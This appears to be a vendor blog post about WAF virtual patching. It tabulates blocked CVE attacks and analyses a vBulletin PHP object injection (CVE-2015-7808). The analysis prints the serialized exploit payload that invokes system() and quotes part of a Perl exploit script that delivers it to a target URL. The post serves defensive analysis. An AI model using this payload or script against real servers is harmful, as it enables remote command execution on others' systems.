Virtual Patching may have its humble beginnings from when the IPS devices first reaped its benefits, today it is, even more, invaluable in our fight against zero-day attacks against web applications. We are going to take a deeper look into how Imperva SecureSphere WAF virtual patching is protecting web applications in the real world.
We did extensive analysis of the CVEs in the blocked alerts for the first two weeks of December following the CVE disclosure and subsequent immediate mitigation done on Imperva SecureSphere WAF.
| CVE Description | Sum of count | Distinct Count of serverGroup |
| CVE-2015-5227: WordPress Landing Pages Plugin Remote Command Execution | 1931 | 35 |
| CVE-2015-1398: Magento Shoplift Vulnerability | 1740 | 159 |
| CVE-2015-7808 vBulletin PHP object injection | 1561 | 109 |
| CVE-2015-1635: Microsoft HTTP.sys DoS | 322 | 18 |
| CVE-2015-4455 Gravity Forms WordPress File Upload | 203 | 6 |
| CVE-2015-4455 Aviary Image Editor file upload | 203 | 6 |
| CVE-2015-2825: WordPress Simple Ads Manager plugin File Upload | 146 | 15 |
| MS15-034/CVE-2015-1635 Attacking Windows Webservers | 92 | 10 |
| MS15-034/CVE-2015-1635 Attacking Windows Webservers 2 | 92 | 10 |
| CVE-2015-4133: ReFlex Gallery WordPress plugin File Upload | 86 | 16 |
| CVE-2015-2208: phpMoAdmin Remote Command Execution | 37 | 13 |
| CVE-2015-5461: WordPress StageShow Open Redirect | 24 | 6 |
| CVE-2015-1635: Microsoft HTTP.sys DoS_user_defined | 14 | 1 |
| CVE-2015-1635: Microsoft HTTP.sys DoS – SOC | 14 | 1 |
| CVE-2015-4852: Apache Commons and Oracle WebLogic Remote Command Execution – 5 | 9 | 1 |
| CVE-2015-4852 Deserialization vulnerability 8 | 9 | 1 |
| CVE-2015-4134: phpwind Open Redirect | 7 | 1 |
| CVE-2015-4553: DedeCMS Unrestricted File Upload – 1 | 4 | 1 |
| CVE-2015-6914: SiteFactory CMS Absolute Path Traversal-2 | 3 | 1 |
| Malformed URL rketing-treng/2015-top-digital-marketing-trends-infographic-recap/ | 2 | 1 |
| CVE-2015-1587: Maarch File Upload | 2 | 1 |
| CVE-2015-4852 Deserialization vulnerability smd.jsp 1 Detection Only | 2 | 2 |
| CVE-2015-5471: WordPress Swim Team Plugin Path Traversal | 1 | 1 |
| CVE-2015-5609: WordPress Image Export Plugin Path Traversal | 1 | 1 |
| Grand Total | 6505 | 416 |
CVE-2015-5227 (Row 1) is a WordPress Remote Code Execution vulnerability that attackers have tried to exploit but were clearly blocked by Imperva. In most cases customers also use dynamic profiling and deploy a positive security model where any anomalous access gets automatically blocked even before the ADC content update happens. The continuous updates from Imperva ADC ensures immediate protection against such high profile CVEs.
The more interesting one is CVE-2015-7808 vBulletin PHP object injection where we first suspected a false positive given the high number of hits and server groups. We put on our detective hats, got our magnifying glasses out and further analyzed the payloads from these events.
The majority of events used the following payload (extracted from our community defense data)
[O:12:”vB_dB_Result”:2:{s:5:” * db”;O:11:”vB_Database”:1:{s:9:”functions”;a:1:{s:11:”free_result”;s:6:”system”;}}s:12:” * recordset”;s:20:”echo $((0xfee10000))”;}]
It was no accident that the code snippet is a match to this piece of code from pastebin. The complete listing can be found here http://pastebin.com/r3PgT4Yh
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;print “nt Enter Target [ Example:http://target.com/forum/ ]”;
print “nn t Enter Target : “;
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . ‘/ajax/api/hook/decodeArguments?arguments=O:12:“vB_dB_Result”:2:{s:5:“%00*%00db”;O:11:“vB_Database”:1:{s:9:“functions”;a:1:{s:11:“free_result”;s:6:“system”;}}s:12:“%00*%00recordset”;s:20:“echo%20$((0xfee10000))”;}’);
We can clearly see that right after we identify the signature echo $((0xfee10000)), there is an object injection that follows.
Vulnerabilies always exist in software, what we constantly notice is how quickly the frequency of attacks increases from the time the CVE is published. Imperva ADC team works round the clock to keep abreast of vulnerabilites via both official and adhoc channels and quickly publishes mitigations taking into account the severity of the CVEs. Virtual Patching is fundamentally important to contain zero day attacks by deploying mitigations quickly without needing to update server software. In this never ending game of cat and mouse, Imperva ADC team is providing the edge and helping our customers stay protected.
Try Imperva for Free
Protect your business for 30 days on Imperva.
